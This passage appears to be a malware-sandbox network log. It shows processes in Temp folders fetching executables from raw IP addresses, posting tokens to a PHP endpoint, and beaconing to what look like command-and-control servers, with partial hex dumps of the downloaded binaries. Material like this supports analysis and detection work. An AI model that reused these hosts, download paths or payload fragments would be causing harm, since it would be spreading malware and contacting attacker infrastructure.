40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAA@A@'A@A4@A4@A4@A@AAA4@A46AA4@ARichAPELYVg$$$@(dm)@%(@%%@(%p%@$.text2$$ `.rdata^$`$@@.data %%@.rsrc%@%%@@.reloc@((@B
Dec 14, 2024 12:57:07.809971094 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 48 53 8b 5d 14 8b c1 56 8b 75 18 0f bf cb 81 c6 2a 3f 18 59 Data Ascii: UHS]Vu?YM}6/MWUEEKEE?YEbE,EQTEnxEELsE1};EzE.EE6/u}uTE7K+E\mfvAE1};
Dec 14, 2024 12:57:07.809993982 CET	448	IN	Data Raw: 08 00 00 a3 e0 28 65 00 b8 d4 4c c6 73 d3 e8 33 c9 89 45 e8 a0 ec 28 65 00 04 11 c7 45 e0 00 00 00 00 88 45 ff 0f b6 c3 66 03 45 10 81 c6 0a 6d 29 1b 0f b7 c0 c7 45 f8 ba 61 00 00 89 45 c8 89 75 18 e9 fc 03 00 00 81 fa d4 4c c6 73 0f 86 85 00 00 Data Ascii: (eLs3E(eEEfEm)EaEuLsEP=]gME}5-lU (eECz(eE+EM(eEiLsEMEU iQTEkuU(eY48((eQTm
Dec 14, 2024 12:57:07.810009956 CET	1236	IN	Data Raw: 00 83 fe 2c 75 67 0f b6 05 ca 28 65 00 be 36 2f 00 00 8b 4d 1c 66 03 c6 8a 5d 10 be e8 94 85 b7 0f b7 c0 89 45 ec 8d 87 85 db a1 e9 0f b6 c9 89 45 f0 0f b6 05 ca 28 65 00 0f af c8 c6 45 fe 6f 89 75 18 c7 45 e4 06 81 00 00 88 0d ca 28 65 00 8b 4d Data Ascii: ,ug(e6/Mf]EE(eEouE(eM)(eMM=bsA]3iOG-{$^i6/EEuEiLs{E=1};s{M,EcKBQTiQTE(eEE(eiE
Dec 14, 2024 12:57:07.810029030 CET	1236	IN	Data Raw: f0 75 24 8a cb b8 28 71 00 00 d3 2d e8 28 65 00 2b c2 66 01 05 ec 28 65 00 b8 6f c9 00 00 5f 5e 5b 8b e5 5d c2 1c 00 8b 45 c8 98 3b d0 7e 16 8b cf b8 6f c9 00 00 d3 2d f0 28 65 00 5f 5e 5b 8b e5 5d c2 1c 00 3b 4d cc 75 20 80 c3 18 0f b6 c3 0f af Data Ascii: u$(q-(e+f(eo_^[]E;~o-(e_^[];Mu (e_^[(eo]EE;E\|'E(e_^[(eE)(eo]E;uDE=(ef5(e](eEY(eE+Ef(eo_^[];Us
Dec 14, 2024 12:57:07.810064077 CET	448	IN	Data Raw: 81 6d e8 44 69 ab 76 0f b7 c0 89 45 dc 89 45 d0 89 75 08 e9 13 08 00 00 8b 45 f8 3b 45 b8 75 4f 8b 45 c8 03 45 e4 8a 4d 0c d2 6d fc 66 8b 0d d8 28 65 00 81 45 cc 77 72 3d 13 81 6d e8 3f 2e 2b 52 89 45 c8 89 45 14 b8 66 25 00 00 66 2b 05 dc 28 65 Data Ascii: mDivEEuE;EuOEEMmf(eEwr=m?.+REEf%f+(ef}EEEEE;UsBu=?M+-(eM(e(euuEMMuu;ve(e:+(EEffuf)(eEf(efuu
Dec 14, 2024 12:57:07.810079098 CET	1236	IN	Data Raw: f4 03 5d b8 2b 7d c4 81 45 d8 cf 38 00 00 89 45 bc 0f b6 c1 0f b6 0d f4 28 65 00 0f af c8 8b c3 0f af 45 08 c7 45 f8 7c ed 3f 69 89 7d 0c 80 c1 23 0f b7 f0 a1 c4 28 65 00 28 45 f0 05 c0 71 d4 be 01 45 e8 89 4d f4 8a 4d fc 8b 45 f4 66 d3 7d 14 8b Data Ascii: ]+}E8E(eEE\|?i}#(e(EqEMMEf}MEuuEUU;UUUE(e(eMuU3(eEE@P+Eml 0iMm5(eM(eEH-kEEE(eE
Dec 14, 2024 12:57:07.810094118 CET	1236	IN	Data Raw: 66 d3 7d 14 0f b6 4d bc a3 e4 28 65 00 b8 af 69 00 00 2b 05 e8 28 65 00 0f b7 c0 89 45 dc 89 45 d0 8b 45 f8 d3 e8 05 d2 c8 7a 45 89 55 10 89 45 f8 8b 45 14 89 45 c8 e9 55 01 00 00 3b 4d cc 75 56 2b 7d d8 8b 45 c4 8b 0d cc 28 65 00 d3 6d c0 8d 97 Data Ascii: f}M(ei+(eEEEzEUEEEU;MuV+}E(emE+EEi+(eEEEE}bEEE=isGfEzUf(e4.(eEBhMEEuE}f(eM
Dec 14, 2024 12:57:07.810110092 CET	1236	IN	Data Raw: 2b ca 8b 45 f8 81 ea cd ea cd 47 98 0f bf c9 0f af c8 81 ee 61 58 00 00 89 55 ec 66 89 0d dc 28 65 00 e9 12 fd ff ff 66 8b 45 14 0f b7 55 0c 3b 55 e8 8b 55 10 98 89 45 a4 75 39 8b 45 c0 2b 05 e8 28 65 00 80 45 fc f0 01 15 e4 28 65 00 89 45 c0 8b Data Ascii: +EGaXUf(efEU;UUEu9E+(eE(eEEEMM(e)E;ErlM(eUfEE)EEf(e(efEEMEuMM+(emf}EEEME`E;uFE3M
Dec 14, 2024 12:57:07.810178995 CET	1236	IN	Data Raw: ec 03 5d c0 8b 7d dc 80 45 18 10 8b 55 10 89 45 f4 8b 45 08 01 05 e8 28 65 00 03 fb 89 75 e0 e9 4b 02 00 00 0f bf 45 d4 3b d0 73 44 8b 45 f0 81 eb 91 4c 1d 15 8a 0d d8 28 65 00 8b 7d dc 00 55 f4 81 c7 ff 53 00 00 8b 55 10 d2 e8 8b 4d 1c 04 64 89 Data Ascii: ]}EUEE(euKE;sDEL(e}USUMdEEf(e~EE9EsbiEfEf5(e)(eEE(eM,8mMEEU3(e(eE9EuE(e
Dec 14, 2024 12:57:07.930048943 CET	1236	IN	Data Raw: 45 10 00 0f af 05 c4 28 65 00 89 55 08 c7 45 c8 59 4d 46 8c 89 45 9c a3 c4 28 65 00 32 c0 01 1d d4 28 65 00 89 45 fc e9 88 00 00 00 3b 55 bc 75 3b 8d 83 d8 c7 d6 8c c7 45 c4 07 a6 31 f4 89 45 ec 81 c3 c6 26 d8 2e 0f b6 c1 8b 4d 14 6b c0 57 88 45 Data Ascii: E(eUEYMFE(e2(eE;Uu;E1E&.MkWEEi9E}E=MMMME(eEEEEt>uu(eEEUUU;UUUM~IEM,SUEyA/EE$uE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49970	31.41.244.11	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:08.957197905 CET	62	OUT	GET /files/hell911/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 12:57:10.301877022 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:10 GMT Content-Type: application/octet-stream Content-Length: 2660864 Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT Connection: keep-alive ETag: "675b72d4-289a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAA@A@'A@A4@A4@A4@A@AAA4@A46AA4@ARichAPELYVg$$$@(dm)@%(@%%@(%p%@$.text2$$ `.rdata^$`$@@.data %%@.rsrc%@%%@@.reloc@((@B
Dec 14, 2024 12:57:10.301918983 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 48 53 8b 5d 14 8b c1 56 8b 75 18 0f bf cb 81 c6 2a 3f 18 59 Data Ascii: UHS]Vu?YM}6/MWUEEKEE?YEbE,EQTEnxEELsE1};EzE.EE6/u}uTE7K+E\m
Dec 14, 2024 12:57:10.301928997 CET	1236	IN	Data Raw: 66 98 76 b9 f4 97 d4 41 0f b7 c0 89 45 e4 8d 87 31 7d 3b ac 89 45 d4 8d 87 d4 4c c6 73 89 5d 14 b3 7d 89 45 e8 8d 42 c2 c7 45 f0 31 30 34 c5 c7 45 d8 5a de 60 5a e9 f3 07 00 00 83 ff 7a 7c 58 8a 5d 10 8d 41 11 88 45 ff 81 c2 c7 a7 00 00 0f bf 05 Data Ascii: fvAE1};ELs]}EBE104EZ`Zz\|X]AE(e.UU)(ef(effE+MEEOGvp(e_(eE6/+(eU (Ei(e.]]E;#RE
Dec 14, 2024 12:57:10.302062988 CET	1236	IN	Data Raw: ee 15 59 34 38 28 0d ca 28 65 00 05 d2 51 e6 54 81 6d 0c 10 6f 00 00 8a 5d 10 89 45 d8 b8 3b 3c ea f6 2b 05 f4 28 65 00 89 45 f0 b8 31 7d 3b ac 2b c2 c6 45 d0 00 81 45 f4 09 ff 00 00 c7 45 ec 09 ff 00 00 89 45 d4 89 75 18 e9 11 03 00 00 3d 36 2f Data Ascii: Y48((eQTmo]E;<+(eE1};+EEEEu=6/E}bEiQTL(e]M(e6/Mv"Ky}u(e*?YE(e,>EiE+ME,ug(e6/
Dec 14, 2024 12:57:10.302073956 CET	448	IN	Data Raw: 02 4d f8 66 d3 3d ec 28 65 00 8b 15 c0 28 65 00 8b 4d 10 d3 ea 0f af d0 b8 6f c9 00 00 5f 5e 5b 89 15 c0 28 65 00 8b e5 5d c2 1c 00 66 3b 45 e4 73 52 8b 45 f8 01 3d d8 28 65 00 0f b7 d0 8b c2 0f b6 c9 0f af 05 c4 28 65 00 5f a3 c4 28 65 00 0f b6 Data Ascii: Mf=(e(eMo_^[(e]f;EsRE=(e(e_(e(e(eXX(e^(eo(e[]E;Ev"(eE_(eo^[]E;Eu%E5(e__(eo^[];Eu$(q-(e+f
Dec 14, 2024 12:57:10.302278042 CET	1236	IN	Data Raw: 6f c9 00 00 5f 5e 5b 8b e5 5d c2 1c 00 3b 55 cc 73 16 8b 55 c8 0f b6 c3 0f bf ca 3b c1 75 09 8b 45 08 01 05 e4 28 65 00 5f 5e b8 6f c9 00 00 5b 8b e5 5d c2 1c 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 5c 53 56 b8 af 69 00 00 89 4d ec 8b Data Ascii: o_^[];UsU;uE(e_^o[]U\SViMEC/W]EErEEEEEAEdEdUJIv+(eEEMAueu]sM3M%zEE@"NE
Dec 14, 2024 12:57:10.302369118 CET	1236	IN	Data Raw: 28 65 00 8b 45 f8 66 01 05 dc 28 65 00 66 89 75 0c 8b 75 e4 8b 7d 0c 0f af f0 81 c7 73 d3 00 00 8b 45 bc 02 05 e8 28 65 00 89 7d 0c 89 45 bc 89 75 e4 8b 75 08 2b f7 89 75 08 89 75 e0 e9 09 07 00 00 0f b7 55 0c 3b 55 c0 8b 55 10 75 7c 8b 0d e8 28 Data Ascii: (eEf(efuu}sE(e}Euu+uuU;UUu\|(ewX!(M(eM;uMuMf(efEf5(eMME3EEEVMuuuEEu;uu\|EEM]+}E8E
Dec 14, 2024 12:57:10.302378893 CET	1236	IN	Data Raw: 65 00 89 45 f8 f7 d8 0f b7 c0 89 45 dc 89 45 d0 8b 45 14 0f b7 f6 89 55 10 89 7d 0c c6 45 18 00 89 75 08 89 75 e0 89 45 c8 e9 49 02 00 00 8b 75 b0 3b 75 ac 7d 71 8b 45 c4 03 05 f4 28 65 00 03 05 e0 28 65 00 01 0d f4 28 65 00 8b 75 08 89 45 c4 89 Data Ascii: eEEEEU}EuuEIu;u}qE(e(e(euEEE(e(eExEfEEEEMfMffEMEEuuu;un]n(e3Ee[O(eM}MmMf}M(ei+
Dec 14, 2024 12:57:10.302625895 CET	1236	IN	Data Raw: 98 c4 02 55 bc 01 45 e8 01 0d f0 28 65 00 d3 6d e4 8b 4d 1c 8d 42 ad 00 45 f4 66 8b 45 fc 02 05 d0 28 65 00 0f af 0d e4 28 65 00 66 89 45 fc 8b 45 f0 02 45 14 89 55 18 89 0d e4 28 65 00 89 7d 0c 89 45 f0 e9 d6 fd ff ff 3b 45 e4 76 23 66 8b 45 14 Data Ascii: UE(emMBEfE(e(efEEEU(e}E;Ev#fE}Es)(eEE}E;vWiE.M(eUEE+(eEE(eEEbf(efMfEI;]s2f(eUf+EG
Dec 14, 2024 12:57:10.302635908 CET	1236	IN	Data Raw: 75 cc 66 8b 4d 14 66 29 0d dc 28 65 00 8b 4d b8 29 0d c0 28 65 00 03 f2 8b 4d ec 03 c6 d3 2d cc 28 65 00 8a 4d fc 89 45 f8 69 c6 c1 f4 0a 88 c6 45 f4 00 89 7d 0c 00 45 18 8b 45 f0 2a 05 f0 28 65 00 d3 eb 8b 4d 1c 89 45 f0 e9 fd 02 00 00 66 8b 45 Data Ascii: ufMf)(eM)(eM-(eMEiE}EE(eMEfEf;EsrE-(e&ul)(em((eMMM(e9aRuEEUifUU}MM(eEfU{E9Eu1E3(eu]}EUEE
Dec 14, 2024 12:57:10.421964884 CET	1236	IN	Data Raw: 54 94 d5 c8 c7 45 f4 0f 8e 65 86 ff 15 18 c0 64 00 89 45 e4 66 a1 c8 28 65 00 66 2b c7 0f b7 c8 89 45 a0 66 a3 c8 28 65 00 a1 e8 28 65 00 0f b7 d0 b8 4e 33 00 00 89 4d 98 66 8b ca 66 d3 e8 8b 0d d0 28 65 00 0f b7 c0 89 45 d0 89 45 a8 8d 81 44 82 Data Ascii: TEedEf(ef+Ef(e(eN3Mff(eEEDEiEEE6UfuMEE(e(e+(e-uE]M4rWEf(eMiE=@E}EE(eUEYMF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49975	185.215.113.16	80	6828	C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:09.724123955 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 14, 2024 12:57:11.064076900 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:10 GMT Content-Type: application/octet-stream Content-Length: 2969600 Last-Modified: Sat, 14 Dec 2024 10:56:36 GMT Connection: keep-alive ETag: "675d6464-2d5000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@01=.@WkD00 @.rsrcD@.idata @bkcrtoce@6@amhigela0*-@.taggant01".-@
Dec 14, 2024 12:57:11.064100981 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:57:11.064111948 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:57:11.064146996 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:57:11.064204931 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: t'y).4_RoSoXg
Dec 14, 2024 12:57:11.064217091 CET	1236	IN	Data Raw: 43 1e 1b 22 0b db 2b d4 ba 02 c8 6f ef 12 1c 45 d3 2b 7f 8f 53 ff 93 e9 38 67 8d 4f 52 5e 64 e7 93 0b c8 7b 56 63 e8 a5 bb db ef 2f 24 78 4d 40 b7 6d af ab 58 07 09 e2 23 dc 7c 8a 13 0c 28 c8 df ff 43 6f 53 0c 00 b4 64 2b e0 57 f5 0f a9 e4 b8 e7 Data Ascii: C"+oE+S8gOR^d{Vc/$xM@mX#\|(CoSd+W{ccSZ_dgk;Y!Z~PEO;^Rh3GRcS?_KVSN/D}s;XiYvW\E;RfsBX$~#\F
Dec 14, 2024 12:57:11.064227104 CET	1236	IN	Data Raw: 09 fb 49 4d f2 48 10 c1 f1 8f e7 62 6a 9a 76 5d cb ed 44 89 44 e7 17 dc e2 ac 8c 57 38 84 0e 03 0a cb 2c 5b c5 65 e7 ac 05 72 1f 16 75 ec 63 ca cb 21 7f 75 94 7d dc 8a 14 a8 45 29 72 99 4d 0f 76 e9 7f 32 bb 0f 63 c5 54 ca 27 82 51 4c 3e fc db db Data Ascii: IMHbjv]DDW8,[eruc!u}E)rMv2cT'QL>u>dLC/{,oxgKde;SbiJC1QH\~+gkh[.7Ln[8D)L:AP\K8Wk
Dec 14, 2024 12:57:11.064400911 CET	1236	IN	Data Raw: 14 e7 34 9a 11 f2 79 1f 37 ab f8 23 b4 25 7f 48 e5 dc 7d b3 3b 54 90 30 12 a4 7f 93 51 bc d0 4c 24 8c af d3 2f f1 9a 3e 0b ba 59 85 d5 b4 a5 e3 ba 92 3d fc 26 e8 7e ae f5 a9 f0 40 4f 66 0b e3 3a 95 e1 ce 62 00 33 cb 6b 6b 04 43 ba a7 0f 90 22 e7 Data Ascii: 4y7#%H};T0QL$/>Y=&~@Of:b3kkC"lf1{3`?%C~h7*'.Kq=4b_<?7-x)f]Z2@m^aw]wK50K\|u0/J2 [:\+^
Dec 14, 2024 12:57:11.064412117 CET	520	IN	Data Raw: c6 09 20 46 3c 43 ac 32 21 1f 9e 7f 28 52 91 af 11 ee ac b7 82 f0 cb 4c f5 51 ae af 0f d7 6d b7 45 34 0c c5 83 b0 ce 56 c7 5d 6f 36 0c f7 cc 53 03 a7 7e f3 0e 6d 33 de 3b 68 90 a9 28 12 99 63 fa 4f 64 87 d4 a9 d3 43 55 7a e4 9e 35 67 1c c0 44 9e Data Ascii: F<C2!(RLQmE4V]o6S~m3;h(cOdCUz5gDO<T]4}S=2rH;#t,5l<a/hP4C7f*r;neD {AErLfK,/hhrP7Iy
Dec 14, 2024 12:57:11.064466953 CET	1236	IN	Data Raw: 7c 8d c8 69 02 03 c9 43 5d 2e 24 54 43 7f 06 4a 51 9e 10 b0 b2 a4 ae a3 49 75 8d 4a 21 db 81 a3 d7 1e c0 bd 69 1b fc df 80 67 9f c2 92 0d a0 61 5b cf 42 4a a9 fd 63 b2 ba c8 df 53 9e 3f 66 3f e7 bb f5 98 03 a6 9e 8f 3c a0 f3 27 fd 53 c0 39 13 39 Data Ascii: \|iC].$TCJQIuJ!iga[BJcS?f?<'S99}f:LFC.p*1l&NgZJJGP'PWJaZSDAII;aoMd3YsA@uWT[RLbdD
Dec 14, 2024 12:57:11.184051991 CET	1236	IN	Data Raw: 6c c3 29 69 e7 78 3e c9 e7 0b 0d 3f c7 eb a8 2f b6 78 bf 64 79 f4 86 c8 7e 0a ab 0d 04 e8 62 e2 bc 9c 57 10 82 0b 95 c1 d2 42 05 e1 72 b4 a9 24 d7 1d 00 4b f4 15 ee fb 74 b4 db 94 b5 f5 bf be e2 b8 85 f9 e1 1b 4e c7 ae 16 56 eb a0 1b 17 0d 78 9a Data Ascii: l)ix>?/xdy~bWBr$KtNVx,Ckccsb>/406fy~G/k2lzVEe\|jq_A7xzN{QL8F}[NsDqKh2K;t#XiQ)r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49983	34.107.221.82	80	8032	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:12.630037069 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:13.674777985 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 86264 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49995	31.41.244.11	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:15.874990940 CET	146	OUT	GET /files/hell911/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Thu, 12 Dec 2024 23:33:40 GMT If-None-Match: "675b72d4-289a00"
Dec 14, 2024 12:57:17.209853888 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:16 GMT Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT Connection: keep-alive ETag: "675b72d4-289a00"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49998	185.215.113.206	80	6828	C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:16.443387032 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAK Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKECFIIEHCFHIECAFBAK--
Dec 14, 2024 12:57:18.278417110 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50007	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:19.857126951 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 30 3d 31 30 31 35 31 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1015172001&unit=246122658369
Dec 14, 2024 12:57:21.192764044 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50021	185.215.113.206	80	1068	C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:22.177234888 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 12:57:23.532856941 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
